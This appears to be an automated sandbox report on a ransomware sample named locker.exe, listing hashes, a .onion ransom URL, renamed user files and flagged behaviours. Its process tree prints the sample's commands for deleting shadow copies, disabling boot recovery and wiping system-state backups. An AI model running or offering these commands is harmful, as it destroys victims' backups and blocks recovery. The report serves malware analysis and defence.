Analysis
-
max time kernel
148s -
max time network
135s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
05-06-2021 10:47
Static task
static1
Behavioral task
behavioral1
Sample
locker.exe
Resource
win10v20210408
General
-
Target
locker.exe
-
Size
448KB
-
MD5
306c47fcb51611bee1ef804c95c7007f
-
SHA1
9cb58078b3fe2119329e482561d0c7cb740e937c
-
SHA256
877c612cf42d85b943010437599b828383ecdf02a17e2b017367db34637e5463
-
SHA512
3ca64189450cf3c3e9867d79c66ee428a5b72b1f45c06243a4a6ab64a2dfd8970d19dc1fba6404468650afac5341a0affae61e05de501180ec6ead20c333f720
Malware Config
Extracted
C:\Users\Admin\Desktop\PROTECT_INFO.TXT
http://dqybwoze7ow3xlamurpfppai4pd6lwybwix2nbhyhcnpsuj3yv32mnyd.onion/index.php
Signatures
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 3668 bcdedit.exe 1132 bcdedit.exe -
Processes:
wbadmin.exepid process 1648 wbadmin.exe -
Modifies extensions of user files 28 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
locker.exedescription ioc process File opened for modification C:\Users\Admin\Pictures\PopUnregister.tif.nermer locker.exe File created C:\Users\Admin\Pictures\UseUndo.png.nermer locker.exe File created C:\Users\Admin\Pictures\CompleteSelect.png.nermer locker.exe File created C:\Users\Admin\Pictures\FormatShow.tif.nermer locker.exe File created C:\Users\Admin\Pictures\PopUnregister.tif.nermer locker.exe File created C:\Users\Admin\Pictures\RevokeTest.tif.nermer locker.exe File created C:\Users\Admin\Pictures\UnlockEdit.crw.nermer locker.exe File opened for modification C:\Users\Admin\Pictures\SubmitUndo.tif.nermer locker.exe File opened for modification C:\Users\Admin\Pictures\UnlockEdit.crw.nermer locker.exe File opened for modification C:\Users\Admin\Pictures\UseLimit.tiff.nermer locker.exe File created C:\Users\Admin\Pictures\RevokeMerge.tif.nermer locker.exe File opened for modification C:\Users\Admin\Pictures\RevokeMerge.tif.nermer locker.exe File created C:\Users\Admin\Pictures\StopBackup.png.nermer locker.exe File created C:\Users\Admin\Pictures\ImportUninstall.tiff.nermer locker.exe File opened for modification C:\Users\Admin\Pictures\ImportUninstall.tiff.nermer locker.exe File opened for modification C:\Users\Admin\Pictures\RevokeTest.tif.nermer locker.exe File opened for modification C:\Users\Admin\Pictures\StopBackup.png.nermer locker.exe File created C:\Users\Admin\Pictures\SubmitUndo.tif.nermer locker.exe File opened for modification C:\Users\Admin\Pictures\UseUndo.png.nermer locker.exe File opened for modification C:\Users\Admin\Pictures\ConfirmRestore.tif.nermer locker.exe File opened for modification C:\Users\Admin\Pictures\FormatShow.tif.nermer locker.exe File created C:\Users\Admin\Pictures\MoveResolve.raw.nermer locker.exe File opened for modification C:\Users\Admin\Pictures\MoveResolve.raw.nermer locker.exe File created C:\Users\Admin\Pictures\RevokeInitialize.png.nermer locker.exe File opened for modification C:\Users\Admin\Pictures\RevokeInitialize.png.nermer locker.exe File opened for modification C:\Users\Admin\Pictures\CompleteSelect.png.nermer locker.exe File created C:\Users\Admin\Pictures\ConfirmRestore.tif.nermer locker.exe File created C:\Users\Admin\Pictures\UseLimit.tiff.nermer locker.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Enumerates connected drives 3 TTPs 42 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
vssadmin.exevssadmin.exevssadmin.exelocker.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exedescription ioc process File opened (read-only) \??\E: vssadmin.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\K: locker.exe File opened (read-only) \??\L: locker.exe File opened (read-only) \??\D: vssadmin.exe File opened (read-only) \??\f: vssadmin.exe File opened (read-only) \??\B: locker.exe File opened (read-only) \??\E: locker.exe File opened (read-only) \??\J: locker.exe File opened (read-only) \??\M: locker.exe File opened (read-only) \??\P: locker.exe File opened (read-only) \??\Y: locker.exe File opened (read-only) \??\Z: locker.exe File opened (read-only) \??\G: locker.exe File opened (read-only) \??\W: locker.exe File opened (read-only) \??\g: vssadmin.exe File opened (read-only) \??\H: vssadmin.exe File opened (read-only) \??\A: locker.exe File opened (read-only) \??\F: locker.exe File opened (read-only) \??\I: locker.exe File opened (read-only) \??\N: locker.exe File opened (read-only) \??\O: locker.exe File opened (read-only) \??\g: vssadmin.exe File opened (read-only) \??\h: vssadmin.exe File opened (read-only) \??\H: vssadmin.exe File opened (read-only) \??\T: locker.exe File opened (read-only) \??\V: locker.exe File opened (read-only) \??\f: vssadmin.exe File opened (read-only) \??\G: vssadmin.exe File opened (read-only) \??\H: locker.exe File opened (read-only) \??\D: vssadmin.exe File opened (read-only) \??\e: vssadmin.exe File opened (read-only) \??\G: vssadmin.exe File opened (read-only) \??\h: vssadmin.exe File opened (read-only) \??\Q: locker.exe File opened (read-only) \??\S: locker.exe File opened (read-only) \??\X: locker.exe File opened (read-only) \??\e: vssadmin.exe File opened (read-only) \??\E: vssadmin.exe File opened (read-only) \??\R: locker.exe File opened (read-only) \??\U: locker.exe -
Drops file in Windows directory 3 IoCs
Processes:
wbadmin.exedescription ioc process File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.3.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.2.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.1.etl wbadmin.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
taskmgr.exedescription ioc process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
taskmgr.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 taskmgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString taskmgr.exe -
Interacts with shadow copies 2 TTPs 13 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exepid process 3168 vssadmin.exe 3868 vssadmin.exe 2668 vssadmin.exe 2752 vssadmin.exe 4060 vssadmin.exe 1516 vssadmin.exe 2752 vssadmin.exe 2728 vssadmin.exe 3356 vssadmin.exe 1132 vssadmin.exe 2068 vssadmin.exe 2116 vssadmin.exe 2236 vssadmin.exe -
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
NOTEPAD.EXEpid process 2556 NOTEPAD.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
locker.exetaskmgr.exepid process 640 locker.exe 640 locker.exe 640 locker.exe 640 locker.exe 640 locker.exe 640 locker.exe 640 locker.exe 640 locker.exe 640 locker.exe 640 locker.exe 640 locker.exe 640 locker.exe 640 locker.exe 640 locker.exe 640 locker.exe 640 locker.exe 640 locker.exe 640 locker.exe 640 locker.exe 640 locker.exe 640 locker.exe 640 locker.exe 640 locker.exe 640 locker.exe 640 locker.exe 640 locker.exe 640 locker.exe 640 locker.exe 640 locker.exe 640 locker.exe 640 locker.exe 640 locker.exe 640 locker.exe 640 locker.exe 640 locker.exe 640 locker.exe 640 locker.exe 640 locker.exe 640 locker.exe 640 locker.exe 640 locker.exe 640 locker.exe 640 locker.exe 640 locker.exe 640 locker.exe 640 locker.exe 640 locker.exe 640 locker.exe 640 locker.exe 640 locker.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe -
Suspicious use of AdjustPrivilegeToken 29 IoCs
Processes:
vssvc.exewmic.exetaskmgr.exedescription pid process Token: SeBackupPrivilege 3948 vssvc.exe Token: SeRestorePrivilege 3948 vssvc.exe Token: SeAuditPrivilege 3948 vssvc.exe Token: SeIncreaseQuotaPrivilege 2488 wmic.exe Token: SeSecurityPrivilege 2488 wmic.exe Token: SeTakeOwnershipPrivilege 2488 wmic.exe Token: SeLoadDriverPrivilege 2488 wmic.exe Token: SeSystemProfilePrivilege 2488 wmic.exe Token: SeSystemtimePrivilege 2488 wmic.exe Token: SeProfSingleProcessPrivilege 2488 wmic.exe Token: SeIncBasePriorityPrivilege 2488 wmic.exe Token: SeCreatePagefilePrivilege 2488 wmic.exe Token: SeBackupPrivilege 2488 wmic.exe Token: SeRestorePrivilege 2488 wmic.exe Token: SeShutdownPrivilege 2488 wmic.exe Token: SeDebugPrivilege 2488 wmic.exe Token: SeSystemEnvironmentPrivilege 2488 wmic.exe Token: SeRemoteShutdownPrivilege 2488 wmic.exe Token: SeUndockPrivilege 2488 wmic.exe Token: SeManageVolumePrivilege 2488 wmic.exe Token: 33 2488 wmic.exe Token: 34 2488 wmic.exe Token: 35 2488 wmic.exe Token: 36 2488 wmic.exe Token: SeDebugPrivilege 2668 taskmgr.exe Token: SeSystemProfilePrivilege 2668 taskmgr.exe Token: SeCreateGlobalPrivilege 2668 taskmgr.exe Token: 33 2668 taskmgr.exe Token: SeIncBasePriorityPrivilege 2668 taskmgr.exe -
Suspicious use of FindShellTrayWindow 54 IoCs
Processes:
taskmgr.exepid process 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe -
Suspicious use of SendNotifyMessage 54 IoCs
Processes:
taskmgr.exepid process 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe 2668 taskmgr.exe -
Suspicious use of WriteProcessMemory 36 IoCs
Processes:
locker.exedescription pid process target process PID 640 wrote to memory of 2752 640 locker.exe vssadmin.exe PID 640 wrote to memory of 2752 640 locker.exe vssadmin.exe PID 640 wrote to memory of 2728 640 locker.exe vssadmin.exe PID 640 wrote to memory of 2728 640 locker.exe vssadmin.exe PID 640 wrote to memory of 3168 640 locker.exe vssadmin.exe PID 640 wrote to memory of 3168 640 locker.exe vssadmin.exe PID 640 wrote to memory of 3356 640 locker.exe vssadmin.exe PID 640 wrote to memory of 3356 640 locker.exe vssadmin.exe PID 640 wrote to memory of 1132 640 locker.exe vssadmin.exe PID 640 wrote to memory of 1132 640 locker.exe vssadmin.exe PID 640 wrote to memory of 3868 640 locker.exe vssadmin.exe PID 640 wrote to memory of 3868 640 locker.exe vssadmin.exe PID 640 wrote to memory of 2068 640 locker.exe vssadmin.exe PID 640 wrote to memory of 2068 640 locker.exe vssadmin.exe PID 640 wrote to memory of 2668 640 locker.exe vssadmin.exe PID 640 wrote to memory of 2668 640 locker.exe vssadmin.exe PID 640 wrote to memory of 2116 640 locker.exe vssadmin.exe PID 640 wrote to memory of 2116 640 locker.exe vssadmin.exe PID 640 wrote to memory of 2752 640 locker.exe vssadmin.exe PID 640 wrote to memory of 2752 640 locker.exe vssadmin.exe PID 640 wrote to memory of 2236 640 locker.exe vssadmin.exe PID 640 wrote to memory of 2236 640 locker.exe vssadmin.exe PID 640 wrote to memory of 4060 640 locker.exe vssadmin.exe PID 640 wrote to memory of 4060 640 locker.exe vssadmin.exe PID 640 wrote to memory of 1516 640 locker.exe vssadmin.exe PID 640 wrote to memory of 1516 640 locker.exe vssadmin.exe PID 640 wrote to memory of 3668 640 locker.exe bcdedit.exe PID 640 wrote to memory of 3668 640 locker.exe bcdedit.exe PID 640 wrote to memory of 1132 640 locker.exe bcdedit.exe PID 640 wrote to memory of 1132 640 locker.exe bcdedit.exe PID 640 wrote to memory of 1648 640 locker.exe wbadmin.exe PID 640 wrote to memory of 1648 640 locker.exe wbadmin.exe PID 640 wrote to memory of 2488 640 locker.exe wmic.exe PID 640 wrote to memory of 2488 640 locker.exe wmic.exe PID 640 wrote to memory of 1516 640 locker.exe cmd.exe PID 640 wrote to memory of 1516 640 locker.exe cmd.exe -
System policy modification 1 TTPs 1 IoCs
Processes:
locker.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" locker.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\locker.exe"C:\Users\Admin\AppData\Local\Temp\locker.exe"1⤵
- Modifies extensions of user files
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Windows\SYSTEM32\vssadmin.exevssadmin.exe Resize ShadowStorage /for=c: /on=c: /maxsize=401MB2⤵
- Interacts with shadow copies
-
C:\Windows\SYSTEM32\vssadmin.exevssadmin.exe Resize ShadowStorage /for=c: /on=c: /maxsize=unbounded2⤵
- Interacts with shadow copies
-
C:\Windows\SYSTEM32\vssadmin.exevssadmin.exe Resize ShadowStorage /for=d: /on=d: /maxsize=401MB2⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\SYSTEM32\vssadmin.exevssadmin.exe Resize ShadowStorage /for=d: /on=d: /maxsize=unbounded2⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\SYSTEM32\vssadmin.exevssadmin.exe Resize ShadowStorage /for=e: /on=e: /maxsize=401MB2⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\SYSTEM32\vssadmin.exevssadmin.exe Resize ShadowStorage /for=e: /on=e: /maxsize=unbounded2⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\SYSTEM32\vssadmin.exevssadmin.exe Resize ShadowStorage /for=f: /on=f: /maxsize=401MB2⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\SYSTEM32\vssadmin.exevssadmin.exe Resize ShadowStorage /for=f: /on=f: /maxsize=unbounded2⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\SYSTEM32\vssadmin.exevssadmin.exe Resize ShadowStorage /for=g: /on=g: /maxsize=401MB2⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\SYSTEM32\vssadmin.exevssadmin.exe Resize ShadowStorage /for=g: /on=g: /maxsize=unbounded2⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\SYSTEM32\vssadmin.exevssadmin.exe Resize ShadowStorage /for=h: /on=h: /maxsize=401MB2⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\SYSTEM32\vssadmin.exevssadmin.exe Resize ShadowStorage /for=h: /on=h: /maxsize=unbounded2⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\SYSTEM32\vssadmin.exevssadmin.exe Delete Shadows /All /Quiet2⤵
- Interacts with shadow copies
-
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} recoveryenabled No2⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\SYSTEM32\wbadmin.exewbadmin DELETE SYSTEMSTATEBACKUP2⤵
- Deletes System State backups
- Drops file in Windows directory
-
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del C:\Users\Admin\AppData\Local\Temp\locker.exe >> NUL2⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\PROTECT_INFO.TXT1⤵
- Opens file in notepad (likely ransom note)
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\Desktop\PROTECT_INFO.TXTMD5
7560b2699bc64d2d9299e7a170d5e98e
SHA123fc0ba18d9e8cad5b0f5dfdd01898bf89ab8983
SHA256f49602115f7882c11c95dfa88f99b42c9776d11ed3bb7486ea00b19c75240f86
SHA512d86a0496b9cd604a701fd784fe4f06196f35cc48726febad46d081cdd9301c6710e9bcc8ec8174075a37258061082e7a83a7c80e513e0fec888fe97907c6b975
-
memory/1132-118-0x0000000000000000-mapping.dmp
-
memory/1132-128-0x0000000000000000-mapping.dmp
-
memory/1516-126-0x0000000000000000-mapping.dmp
-
memory/1516-132-0x0000000000000000-mapping.dmp
-
memory/1648-129-0x0000000000000000-mapping.dmp
-
memory/2068-120-0x0000000000000000-mapping.dmp
-
memory/2116-122-0x0000000000000000-mapping.dmp
-
memory/2236-124-0x0000000000000000-mapping.dmp
-
memory/2488-130-0x0000000000000000-mapping.dmp
-
memory/2668-121-0x0000000000000000-mapping.dmp
-
memory/2728-115-0x0000000000000000-mapping.dmp
-
memory/2752-114-0x0000000000000000-mapping.dmp
-
memory/2752-123-0x0000000000000000-mapping.dmp
-
memory/3168-116-0x0000000000000000-mapping.dmp
-
memory/3356-117-0x0000000000000000-mapping.dmp
-
memory/3668-127-0x0000000000000000-mapping.dmp
-
memory/3868-119-0x0000000000000000-mapping.dmp
-
memory/4060-125-0x0000000000000000-mapping.dmp